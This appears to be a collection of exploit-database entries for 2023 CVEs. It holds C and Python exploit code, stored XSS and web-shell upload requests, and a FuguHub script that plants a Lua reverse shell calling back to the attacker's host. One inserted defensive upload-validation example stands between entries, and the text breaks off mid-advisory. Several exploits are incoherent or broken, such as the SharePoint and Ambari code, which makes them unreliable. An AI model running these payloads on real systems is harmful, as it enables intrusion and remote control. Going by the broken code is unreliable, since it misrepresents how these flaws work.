
// Exploit Title: Microsoft SharePoint Enterprise Server 2016 - Spoofing
// Date: 2023-06-20
// country: Iran
// Exploit Author: Amirhossein Bahramizadeh
// Category : Remote
// Vendor Homepage:
// Microsoft SharePoint Foundation 2013 Service Pack 1
// Microsoft SharePoint Server Subscription Edition
// Microsoft SharePoint Enterprise Server 2013 Service Pack 1
// Microsoft SharePoint Server 2019
// Microsoft SharePoint Enterprise Server 2016
// Tested on: Windows/Linux
// CVE : CVE-2023-28288

#include <windows.h>
#include <wininet.h>   // InternetOpen, InternetConnect, HttpOpenRequest, InternetReadFile
#include <stdio.h>
#include <string.h>    // strlen

#pragma comment(lib, "wininet.lib")   // MSVC; with MinGW link with -lwininet

// Forward declaration: the helper is defined after main()
BOOL InternetReadFileUrl(const char *url, HANDLE file);


// The vulnerable SharePoint server URL
const char *server_url = "http://example.com/";

// The URL of the fake SharePoint server
const char *fake_url = "http://attacker.com/";

// The vulnerable SharePoint server file name
const char *file_name = "vuln_file.aspx";

// The fake SharePoint server file name
const char *fake_file_name = "fake_file.aspx";

int main()
{
    HANDLE file;
    DWORD bytes_written;
    char file_contents[1024];

    // Create the fake file contents
    sprintf(file_contents, "<html><head></head><body><p>This is a fake file.</p></body></html>");

    // Write the fake file to disk
    file = CreateFile(fake_file_name, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
    if (file == INVALID_HANDLE_VALUE)
    {
        printf("Error creating fake file: %d\n", GetLastError());
        return 1;
    }
    if (!WriteFile(file, file_contents, strlen(file_contents), &bytes_written, NULL))
    {
        printf("Error writing fake file: %d\n", GetLastError());
        CloseHandle(file);
        return 1;
    }
    CloseHandle(file);

    // Send a request to the vulnerable SharePoint server to download the file
    sprintf(file_contents, "%s%s", server_url, file_name);
    file = CreateFile(file_name, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
    if (file == INVALID_HANDLE_VALUE)
    {
        printf("Error creating vulnerable file: %d\n", GetLastError());
        return 1;
    }
    if (!InternetReadFileUrl(file_contents, file))
    {
        printf("Error downloading vulnerable file: %d\n", GetLastError());
        CloseHandle(file);
        return 1;
    }
    CloseHandle(file);

    // Replace the vulnerable file with the fake file
    if (!DeleteFile(file_name))
    {
        printf("Error deleting vulnerable file: %d\n", GetLastError());
        return 1;
    }
    if (!MoveFile(fake_file_name, file_name))
    {
        printf("Error replacing vulnerable file: %d\n", GetLastError());
        return 1;
    }

    // Send a request to the vulnerable SharePoint server to trigger the vulnerability
    sprintf(file_contents, "%s%s", server_url, file_name);
    if (!InternetReadFileUrl(file_contents, NULL))
    {
        printf("Error triggering vulnerability: %d\n", GetLastError());
        return 1;
    }

    // Print a message indicating that the vulnerability has been exploited
    printf("Vulnerability exploited successfully.\n");

    return 0;
}

BOOL InternetReadFileUrl(const char *url, HANDLE file)
{
    HINTERNET internet, connection, request;
    DWORD bytes_read;
    char buffer[1024];

    // Open an Internet connection
    internet = InternetOpen("Mozilla/5.0 (Windows NT 10.0; Win64; x64)", INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0);
    if (internet == NULL)
    {
        return FALSE;
    }

    // Connect to the server
    connection = InternetConnect(internet, fake_url, INTERNET_DEFAULT_HTTP_PORT, NULL, NULL, INTERNET_SERVICE_HTTP, 0, 0);
    if (connection == NULL)
    {
        InternetCloseHandle(internet);
        return FALSE;
    }

    // Send the HTTP request
    request = HttpOpenRequest(connection, "GET", url, NULL, NULL, NULL, 0, 0);
    if (request == NULL)
    {
        InternetCloseHandle(connection);
        InternetCloseHandle(internet);
        return FALSE;
    }
    if (!HttpSendRequest(request, NULL, 0, NULL, 0))
    {
        InternetCloseHandle(request);
        InternetCloseHandle(connection);
        InternetCloseHandle(internet);
        return FALSE;
    }

    // Read the response data
    while (InternetReadFile(request, buffer, sizeof(buffer), &bytes_read) && bytes_read > 0)
    {
        if (file != NULL)
        {
            // Write the data to disk
            if (!WriteFile(file, buffer, bytes_read, &bytes_read, NULL))
            {
                InternetCloseHandle(request);
                InternetCloseHandle(connection);
                InternetCloseHandle(internet);
                return FALSE;
            }
        }
    }

    InternetCloseHandle(request);
    InternetCloseHandle(connection);
    InternetCloseHandle(internet);
    return TRUE;
}
            
// Exploit Title: Windows 11 22h2 - Kernel Privilege Elevation
// Date: 2023-06-20
// country: Iran
// Exploit Author: Amirhossein Bahramizadeh
// Category : webapps
// Vendor Homepage:
// Tested on: Windows/Linux
// CVE : CVE-2023-28293

#include <windows.h>
#include <stdio.h>
#include <string.h>   // memset

// Forward declarations: the helpers are defined after main()
BOOL LoadDriver(LPCTSTR driver_name, LPCTSTR service_name);
BOOL UnloadDriver(LPCTSTR service_name);

// The vulnerable driver file name
const char *driver_name = "vuln_driver.sys";

// The vulnerable driver device name
const char *device_name = "\\\\.\\VulnDriver";

// The IOCTL code to trigger the vulnerability
#define IOCTL_VULN_CODE 0x222003

// The buffer size for the IOCTL input/output data
#define IOCTL_BUFFER_SIZE 0x1000

int main()
{
    HANDLE device;
    DWORD bytes_returned;
    char input_buffer[IOCTL_BUFFER_SIZE];
    char output_buffer[IOCTL_BUFFER_SIZE] = {0};   // zero-filled so the %s print below is NUL-terminated

    // Load the vulnerable driver
    if (!LoadDriver(driver_name, "\\Driver\\VulnDriver"))
    {
        printf("Error loading vulnerable driver: %d\n", GetLastError());
        return 1;
    }

    // Open the vulnerable driver device
    device = CreateFile(device_name, GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    if (device == INVALID_HANDLE_VALUE)
    {
        printf("Error opening vulnerable driver device: %d\n", GetLastError());
        return 1;
    }

    // Fill the input buffer with data to trigger the vulnerability
    memset(input_buffer, 'A', IOCTL_BUFFER_SIZE);

    // Send the IOCTL to trigger the vulnerability
    if (!DeviceIoControl(device, IOCTL_VULN_CODE, input_buffer, IOCTL_BUFFER_SIZE, output_buffer, IOCTL_BUFFER_SIZE, &bytes_returned, NULL))
    {
        printf("Error sending IOCTL: %d\n", GetLastError());
        return 1;
    }

    // Print the output buffer contents
    printf("Output buffer:\n%s\n", output_buffer);

    // Unload the vulnerable driver
    if (!UnloadDriver("\\Driver\\VulnDriver"))
    {
        printf("Error unloading vulnerable driver: %d\n", GetLastError());
        return 1;
    }

    // Close the vulnerable driver device
    CloseHandle(device);

    return 0;
}

BOOL LoadDriver(LPCTSTR driver_name, LPCTSTR service_name)
{
    SC_HANDLE sc_manager, service;
    DWORD error;

    // Open the Service Control Manager
    sc_manager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);
    if (sc_manager == NULL)
    {
        return FALSE;
    }

    // Create the service
    service = CreateService(sc_manager, service_name, service_name, SERVICE_ALL_ACCESS, SERVICE_KERNEL_DRIVER, SERVICE_DEMAND_START, SERVICE_ERROR_NORMAL, driver_name, NULL, NULL, NULL, NULL, NULL);
    if (service == NULL)
    {
        error = GetLastError();
        if (error == ERROR_SERVICE_EXISTS)
        {
            // The service already exists, so open it instead
            service = OpenService(sc_manager, service_name, SERVICE_ALL_ACCESS);
            if (service == NULL)
            {
                CloseServiceHandle(sc_manager);
                return FALSE;
            }
        }
        else
        {
            CloseServiceHandle(sc_manager);
            return FALSE;
        }
    }

    // Start the service
    if (!StartService(service, 0, NULL))
    {
        error = GetLastError();
        if (error != ERROR_SERVICE_ALREADY_RUNNING)
        {
            CloseServiceHandle(service);
            CloseServiceHandle(sc_manager);
            return FALSE;
        }
    }

    CloseServiceHandle(service);
    CloseServiceHandle(sc_manager);
    return TRUE;
}

BOOL UnloadDriver(LPCTSTR service_name)
{
    SC_HANDLE sc_manager, service;
    SERVICE_STATUS status;
    DWORD error;

    // Open the Service Control Manager
    sc_manager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);
    if (sc_manager == NULL)
    {
        return FALSE;
    }

    // Open the service
    service = OpenService(sc_manager, service_name, SERVICE_ALL_ACCESS);
    if (service == NULL)
    {
        CloseServiceHandle(sc_manager);
        return FALSE;
    }

    // Stop the service
    if (!ControlService(service, SERVICE_CONTROL_STOP, &status))
    {
        error = GetLastError();
        if (error != ERROR_SERVICE_NOT_ACTIVE)
        {
            CloseServiceHandle(service);
            CloseServiceHandle(sc_manager);
            return FALSE;
        }
    }

    // Delete the service
    if (!DeleteService(service))
    {
        CloseServiceHandle(service);
        CloseServiceHandle(sc_manager);
        return FALSE;
    }

    CloseServiceHandle(service);
    CloseServiceHandle(sc_manager);
    return TRUE;
}
            
# Exploit Title: MCL-Net 4.3.5.8788 - Information Disclosure
# Date: 5/31/2023
# Exploit Author: Victor A. Morales, GM Sectec Inc.
# Vendor Homepage: https://www.mcl-mobilityplatform.com/net.php
# Version: 4.3.5.8788 (other versions may be affected)
# Tested on: Microsoft Windows 10 Pro
# CVE: CVE-2023-34834

Description:
Directory browsing vulnerability in MCL-Net version 4.3.5.8788 webserver running on default port 5080, allows attackers to gain sensitive information about the configured databases via the "/file" endpoint.

Steps to reproduce:
1. Navigate to the webserver on default port 5080, where "Index of Services" will disclose directories, including the "/file" directory. 
2. Browse to the "/file" directory and the configured database entry folders.
3. The "AdoInfo.txt" file will contain the database connection strings in plaintext for the configured database. Other files containing database information are also available inside the directory.
            
# Exploit Title: PrestaShop Winbiz Payment module - Improper Limitation of a Pathname to a Restricted Directory
# Date: 2023-06-20
# Dork: /modules/winbizpayment/downloads/download.php
# country: Iran
# Exploit Author: Amirhossein Bahramizadeh
# Category : webapps
# Vendor Homepage: https://shop.webbax.ch/modules-pour-winbiz/153-module-prestashop-winbiz-payment-reverse.html
# Version: 17.1.3 (REQUIRED)
# Tested on: Windows/Linux
# CVE : CVE-2023-30198

import requests
import string
import random

# The base URL of the vulnerable site
base_url = "http://example.com"

# The URL of the login page
login_url = base_url + "/authentication.php"

# The username and password for the admin account
username = "admin"
password = "password123"

# The URL of the vulnerable download.php file
download_url = base_url + "/modules/winbizpayment/downloads/download.php"

# The ID of the order to download
order_id = 1234

# The path to save the downloaded file
file_path = "/tmp/order_%d.pdf" % order_id

# The session cookies to use for the requests
session_cookies = None

# Generate a random string for the CSRF token
csrf_token = ''.join(random.choices(string.ascii_uppercase + string.digits, k=32))

# Send a POST request to the login page to authenticate as the admin user
login_data = {"email": username, "passwd": password, "csrf_token": csrf_token}
session = requests.Session()
response = session.post(login_url, data=login_data)

# Save the session cookies for future requests
session_cookies = session.cookies.get_dict()

# Generate a random string for the CSRF token
csrf_token = ''.join(random.choices(string.ascii_uppercase + string.digits, k=32))

# Send a POST request to the download.php file to download the order PDF
download_data = {"id_order": order_id, "csrf_token": csrf_token}
response = session.post(download_url, cookies=session_cookies, data=download_data)

# Save the downloaded file to disk
with open(file_path, "wb") as f:
    f.write(response.content)

# Print a message indicating that the file has been downloaded
print("File downloaded to %s" % file_path)
            
# Exploit Title: Azure Apache Ambari 2302250400 - Spoofing
# Date: 2023-06-23
# country: Iran
# Exploit Author: Amirhossein Bahramizadeh
# Category : Remote
# Vendor Homepage:
# Microsoft
# Apache Ambari
# Microsoft azure Hdinsights
# Tested on: Windows/Linux
# CVE : CVE-2023-23408

import requests

# Set the URL and headers for the Ambari web interface
url = "https://ambari.example.com/api/v1/clusters/cluster_name/services"
headers = {"X-Requested-By": "ambari", "Authorization": "Basic abcdefghijklmnop"}

# Define a function to validate the headers
def validate_headers(headers):
    if "X-Requested-By" not in headers or headers["X-Requested-By"] != "ambari":
        return False
    if "Authorization" not in headers or headers["Authorization"] != "Basic abcdefghijklmnop":
        return False
    return True

# Define a function to send a request to the Ambari web interface
def send_request(url, headers):
    if not validate_headers(headers):
        print("Invalid headers")
        return
    response = requests.get(url, headers=headers)
    if response.status_code == 200:
        print("Request successful")
    else:
        print("Request failed")

# Call the send_request function with the URL and headers
send_request(url, headers)
            
Exploit Title: Rukovoditel 3.4.1 - Multiple Stored XSS
Version: 3.4.1
Bugs:  Multiple Stored XSS
Technology: PHP
Vendor URL: https://www.rukovoditel.net/
Software Link: https://www.rukovoditel.net/download.php
Date of found: 24-06-2023
Author: Mirabbas Ağalarov
Tested on: Linux 


2. Technical Details & POC
========================================
               ###XSS-1###
========================================
steps:
1. login to account
2. create project (http://localhost/index.php?module=items/items&path=21)
3. add task      
4. open task 
5. add comment as "<iframe src="https://14.rs"></iframe> "


POST /index.php?module=items/comments&action=save&token=FEOZ9jeKuA HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 241
Origin: http://localhost
Connection: close
Referer: http://localhost/index.php?module=items/info&path=21-2/22-1&redirect_to=subentity&gotopage[74]=1
Cookie: cookie_test=please_accept_for_session; sid=vftrl4mhmbvdbrvfmb0rb54vo5
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

form_session_token=FEOZ9jeKuA&path=21-2%2F22-1&fields%5B169%5D=47&fields%5B170%5D=53&fields%5B174%5D=3&description=%3Ciframe+src%3D%22https%3A%2F%2F14.rs%22%3E%3C%2Fiframe%3E+&uploadifive_attachments_upload_attachments=&comments_attachments=

===========================
               ###XSS-2###
===========================
1. go to admin account
2. go to configuration => application
3. Copyright Text set as "<img src=x onerror=alert(1)>"


POST /index.php?module=configuration/save&redirect_to=configuration/application HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------12298384558648010343132232769
Content-Length: 2766
Origin: http://localhost
Connection: close
Referer: http://localhost/index.php?module=configuration/application
Cookie: cookie_test=please_accept_for_session; sid=vftrl4mhmbvdbrvfmb0rb54vo5
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="form_session_token"

ju271AAoy1
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[APP_NAME]"

Rukovoditel
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[APP_SHORT_NAME_MOBILE]"

ffgsdfgsdfg
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[APP_SHORT_NAME]"

ruko
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="APP_LOGO"; filename=""
Content-Type: application/octet-stream


-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[APP_LOGO]"


-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[APP_LOGO_URL]"


-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="APP_FAVICON"; filename=""
Content-Type: application/octet-stream


-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[APP_FAVICON]"


-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[APP_COPYRIGHT_NAME]"

<img src=x onerror=alert(1)>
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[APP_LANGUAGE]"

english.php
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[APP_SKIN]"


-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[APP_TIMEZONE]"

America/New_York
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[APP_ROWS_PER_PAGE]"

10
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[APP_DATE_FORMAT]"

m/d/Y
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[APP_DATETIME_FORMAT]"

m/d/Y H:i
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[APP_NUMBER_FORMAT]"

2/./*
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[APP_FIRST_DAY_OF_WEEK]"

0
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[DROP_DOWN_MENU_ON_HOVER]"

0
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[DISABLE_CHECK_FOR_UPDATES]"

0
-----------------------------12298384558648010343132232769--
            
# Exploit Title: Xenforo Version 2.2.13 - Authenticated Stored XSS
# Date: 2023-06-24
# Exploit Author: Furkan Karaarslan
# Category : Webapps
# Vendor Homepage: https://x.com/admin.php?smilies
# Version: 2.2.12 (REQUIRED)
# Tested on: Windows/Linux
# CVE : 

-----------------------------------------------------------------------------
Requests

POST /admin.php?smilie-categories/0/save HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/admin.php?smilies/
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------333176689514537912041638543422
Content-Length: 1038
Origin: http://127.0.0.1
Connection: close
Cookie: xf_csrf=aEWkQ90jbPs2RECi; xf_session=yCLGXIhbOq9bSNKAsymJPWYVvTotiofa; xf_session_admin=wlr6UqjWxCkpfjKlngAvH5t-4yGiK5mQ
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------333176689514537912041638543422
Content-Disposition: form-data; name="_xfToken"

1687616851,83fd2350307156281e51b17e20fe575b
-----------------------------333176689514537912041638543422
Content-Disposition: form-data; name="title"

<img src=x onerror=alert(document.domain)>
-----------------------------333176689514537912041638543422
Content-Disposition: form-data; name="display_order"

1
-----------------------------333176689514537912041638543422
Content-Disposition: form-data; name="_xfRequestUri"

/admin.php?smilies/
-----------------------------333176689514537912041638543422
Content-Disposition: form-data; name="_xfWithData"

1
-----------------------------333176689514537912041638543422
Content-Disposition: form-data; name="_xfToken"

1687616849,b74724a115448b864ba2db8f89f415f5
-----------------------------333176689514537912041638543422
Content-Disposition: form-data; name="_xfResponseType"

json
-----------------------------333176689514537912041638543422--


Response: After it is created, an alert comes immediately.
            
# Exploit Title: Sales of Cashier Goods v1.0 - Cross Site Scripting (XSS)
# Date: 2023-06-23
# country: Iran
# Exploit Author: Amirhossein Bahramizadeh
# Category : webapps
# Dork : /print.php?nm_member=
# Vendor Homepage: https://www.codekop.com/products/source-code-aplikasi-pos-penjualan-barang-kasir-dengan-php-mysql-3.html
# Tested on: Windows/Linux
# CVE : CVE-2023-36346

import requests
import urllib.parse

# Set the target URL and payload
url = "http://example.com/print.php"
payload = "<script>alert('XSS')</script>"

# Encode the payload for URL inclusion
payload = urllib.parse.quote(payload)

# Build the request parameters
params = {
    "nm_member": payload
}

# Send the request and print the response
response = requests.get(url, params=params)
print(response.text)
            
# Exploit Title: POS Codekop v2.0 - Authenticated Remote Code Execution (RCE)
# Date: 25-05-2023
# Exploit Author: yuyudhn
# Vendor Homepage: https://www.codekop.com/
# Software Link: https://github.com/fauzan1892/pos-kasir-php
# Version: 2.0
# Tested on: Linux
# CVE: CVE-2023-36348
# Vulnerability description: The application does not sanitize the filename
parameter when sending data to /fungsi/edit/edit.php?gambar=user. An
attacker can exploit this issue by uploading a PHP file and accessing it,
leading to Remote Code Execution.
# Reference: https://yuyudhn.github.io/pos-codekop-vulnerability/

# Proof of Concept:
1. Login to POS Codekop dashboard.
2. Go to profile settings.
3. Upload PHP script through Upload Profile Photo.

Burp Log Example:
```
POST /research/pos-kasir-php/fungsi/edit/edit.php?gambar=user HTTP/1.1
Host: localhost
Content-Length: 8934
Cache-Control: max-age=0
sec-ch-ua:
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: ""
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarymVBHqH4m6KgKBnpa
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.91 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/research/pos-kasir-php/index.php?page=user
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=vqlfiarme77n1r4o8eh2kglfhv
Connection: close

------WebKitFormBoundarymVBHqH4m6KgKBnpa
Content-Disposition: form-data; name="foto"; filename="asuka-rce.php"
Content-Type: image/jpeg

ÿØÿà JFIF HHÿþ6<?php passthru($_GET['cmd']); __halt_compiler(); ?>
ÿÛC

-----------------------------
```
PHP Web Shell location:
http://localhost/research/pos-kasir-php/assets/img/user/[random_number]asuka-rce.php
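Added example, not code from POS Codekop or from the advisory: a server-side check for the profile-photo upload in step 3, written in Python rather than the application's PHP. It shows that the request above passes a Content-Type or JPEG-magic check and is stopped only by refusing executable extensions, refusing PHP tags in the body and storing under a server-chosen name. Function and constant names are this example's own, and the sample bodies are constructed.

```python
import os
import re
import secrets

# Allowlist for a profile-photo upload (compared lower-case).
ALLOWED_EXT = {"jpg", "jpeg", "png", "gif"}

# Extensions a web server may hand to an interpreter. Every dotted segment of the
# name is checked against this set, so "shell.php.jpg" is rejected as well.
EXECUTABLE_EXT = {"php", "php3", "php4", "php5", "php7", "phtml", "phar",
                  "cgi", "pl", "py", "sh", "htaccess"}

# Leading bytes expected for each allowed type.
MAGIC = {
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n",
    "gif": b"GIF8",
}

ALLOWED_CONTENT_TYPES = {"image/jpeg", "image/png", "image/gif"}

# A PHP open tag anywhere in the body. The advisory's upload has a valid JPEG
# header followed by one; the interpreter does not care about the header.
PHP_OPEN_TAG = re.compile(rb"<\?(php\b|=)", re.IGNORECASE)


def check_upload(client_filename, content_type, data):
    """Return (accepted, reason, stored_name).

    stored_name is a server-generated random name; the client-supplied name is
    used only to derive the extension and never reaches the filesystem.
    """
    # Strip any directory part the client may have sent (either separator).
    base = os.path.basename(client_filename.replace("\\", "/"))
    parts = base.lower().split(".")
    if len(parts) < 2 or not parts[0] or not parts[-1]:
        return False, "missing extension", None
    ext = parts[-1]
    if any(p in EXECUTABLE_EXT for p in parts[1:]):
        return False, "executable extension", None
    if ext not in ALLOWED_EXT:
        return False, "extension not allowed", None
    if content_type not in ALLOWED_CONTENT_TYPES:
        return False, "content type not allowed", None
    if not data.startswith(MAGIC[ext]):
        return False, "magic bytes do not match extension", None
    if PHP_OPEN_TAG.search(data):
        return False, "embedded PHP tag", None
    stored = secrets.token_hex(16) + "." + ext
    return True, "ok", stored


# Constructed sample bodies. POLYGLOT mirrors the advisory's upload: a JPEG
# header, then a PHP web shell inside a comment segment.
POLYGLOT = (b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01\x00\x00H\x00H\x00\x00"
            b"\xff\xfe\x006<?php passthru($_GET['cmd']); __halt_compiler(); ?>"
            b"\xff\xdb\x00C")
CLEAN_JPEG = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 32 + b"\xff\xd9"


if __name__ == "__main__":
    for name, ctype, body in [
        ("asuka-rce.php", "image/jpeg", POLYGLOT),    # the advisory's request
        ("avatar.jpg", "image/jpeg", POLYGLOT),       # renamed polyglot
        ("shell.php.jpg", "image/jpeg", CLEAN_JPEG),  # double extension
        ("me.jpg", "image/jpeg", CLEAN_JPEG),         # legitimate upload
    ]:
        print(name, check_upload(name, ctype, body))
```

The upload directory (assets/img/user/ in the advisory) should additionally be served with script execution disabled, so a file that slips past the check is still only delivered as bytes.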
            
# Exploit Title: FuguHub 8.1 - Remote Code Execution
# Date: 6/24/2023
# Exploit Author: redfire359 
# Vendor Homepage: https://fuguhub.com/
# Software Link: https://fuguhub.com/download.lsp
# Version: 8.1
# Tested on: Ubuntu 22.04.1
# CVE : CVE-2023-24078 

import requests
from bs4 import BeautifulSoup
import hashlib
from random import randint
from urllib3 import encode_multipart_formdata
from urllib3.exceptions import InsecureRequestWarning
import argparse
from colorama import Fore
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)

#Options for user registration, if no user has been created yet 
username = 'admin'
password = 'password'
email = 'admin@admin.com'

parser = argparse.ArgumentParser()
parser.add_argument("-r","--rhost", help = "Victims ip/url (omit the http://)", required = True)
parser.add_argument("-rp","--rport", help = "http port [Default 80]")
parser.add_argument("-l","--lhost", help = "Your IP", required = True)
parser.add_argument("-p","--lport", help = "Port you have your listener on", required = True)
args = parser.parse_args()

LHOST = args.lhost
LPORT = args.lport
url = args.rhost
if args.rport != None:
    port = args.rport
else:
    port = 80

def main():
    checkAccount()

def checkAccount():
    print(f"{Fore.YELLOW}[*]{Fore.WHITE} Checking for admin user...")
    s = requests.Session()
    
    # Go to the set admin page... if page contains "User database already saved" then there are already admin creds and we will try to login with the creds, otherwise we will manually create an account
    r = s.get(f"http://{url}:{port}/Config-Wizard/wizard/SetAdmin.lsp") 
    soup = BeautifulSoup(r.content, 'html.parser')
    search = soup.find('h1')
    
    if r.status_code == 404:
        print(Fore.RED + "[!]" + Fore.WHITE +" Page not found! Check the following: \n\tTarget IP\n\tTarget Port")
        exit(0)

    userExists = False
    userText = 'User database already saved'
    for i in search:
        if i.string == userText:
            userExists = True
    
    if userExists:
        print(f"{Fore.GREEN}[+]{Fore.WHITE} An admin user does exist..")
        login(r,s)
    else:
        print(f"{Fore.GREEN}[+]{Fore.WHITE} No admin user exists yet, creating account with {username}:{password}")
        createUser(r,s)
        login(r,s)

def createUser(r,s):
    data = { email : email , 
            'user' : username , 
            'password' : password , 
            'recoverpassword' : 'on' }
    r = s.post(f"http://{url}:{port}/Config-Wizard/wizard/SetAdmin.lsp", data = data)
    print(f"{Fore.GREEN}[+]{Fore.WHITE} User Created!")    

def login(r,s):
    print(f"{Fore.GREEN}[+]{Fore.WHITE} Logging in...")

    data = {'ba_username' : username , 'ba_password' : password}
    r = s.post(f"https://{url}:443/rtl/protected/wfslinks.lsp", data = data, verify = False ) # switching to https cause its easier to script lolz  

    # Verify login
    login_Success_Title = 'Web-File-Server'
    soup = BeautifulSoup(r.content, 'html.parser')
    search = soup.find('title')
    
    for i in search:
        if i != login_Success_Title:
            print(f"{Fore.RED}[!]{Fore.WHITE} Error! We got sent back to the login page...")
            exit(0)
    print(f"{Fore.GREEN}[+]{Fore.WHITE} Success! Finding a valid file server link...")

    exploit(r,s)

def exploit(r,s):
    #Find the file server, default is fs
    r = s.get(f"https://{url}:443/fs/cmsdocs/")
    
    code = r.status_code

    if code == 404:
        print(f"{Fore.RED}[!]{Fore.WHITE} File server not found. ")
        exit(0)

    print(f"{Fore.GREEN}[+]{Fore.WHITE} Code: {code}, found valid file server, uploading rev shell")
    
    #Change the shell if you want to, when tested I've had the best luck with lua rev shell code so thats what I put as default 
    shell = f'local host, port = "{LHOST}", {LPORT} \nlocal socket = require("socket")\nlocal tcp = socket.tcp() \nlocal io = require("io") tcp:connect(host, port); \n while 						true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, "r") local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()'

    
    file_content = f'''
	<h2> Check ur nc listener on the port you put in <h2>

	<?lsp if request:method() == "GET" then ?>
		<?lsp 
        {shell}		
		?>
	<?lsp else ?>
		Wrong request method, goodBye! 
	<?lsp end ?>
	'''

    files = {'file': ('rev.lsp', file_content, 'application/octet-stream')}
    r = s.post(f"https://{url}:443/fs/cmsdocs/", files=files)
    
    if r.text == 'ok' :
        print(f"{Fore.GREEN}[+]{Fore.WHITE} Successfully uploaded, calling shell ")
        r = s.get(f"https://{url}:443/rev.lsp")

if __name__=='__main__':
    try:
        main()
    except:
        print(f"\n{Fore.YELLOW}[*]{Fore.WHITE} Good bye!\n\n**All Hail w4rf4ther!")
            
Exploit Title: WebsiteBaker v2.13.3 - Stored XSS
Application: WebsiteBaker
Version: 2.13.3
Bugs:  Stored XSS
Technology: PHP
Vendor URL: https://websitebaker.org/pages/en/home.php
Software Link: https://wiki.websitebaker.org/doku.php/en/downloads
Date of found: 26.06.2023
Author: Mirabbas Ağalarov
Tested on: Linux 


2. Technical Details & POC
========================================
steps: 

1. login to account
2. go to media
3. upload svg file

"""
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert(document.location);
   </script>
</svg>
"""
4. go to svg file (http://localhost/media/malas.svg)
            
## Title: Microsoft 365 MSO (Version 2305 Build 16.0.16501.20074) 64-bit - Remote Code Execution (RCE)
## Author: nu11secur1ty
## Date: 04.17.2023
## Vendor: https://www.microsoft.com/
## Software: https://www.microsoft.com/en-us/microsoft-365/
## Reference: https://www.crowdstrike.com/cybersecurity-101/remote-code-execution-rce/
## CVE-2023-28285


## Description:
The attack itself is carried out locally by a user with authentication
to the targeted system. An attacker could exploit the vulnerability by
convincing a victim, through social engineering, to download and open
a specially crafted file from a website, which could lead to a local
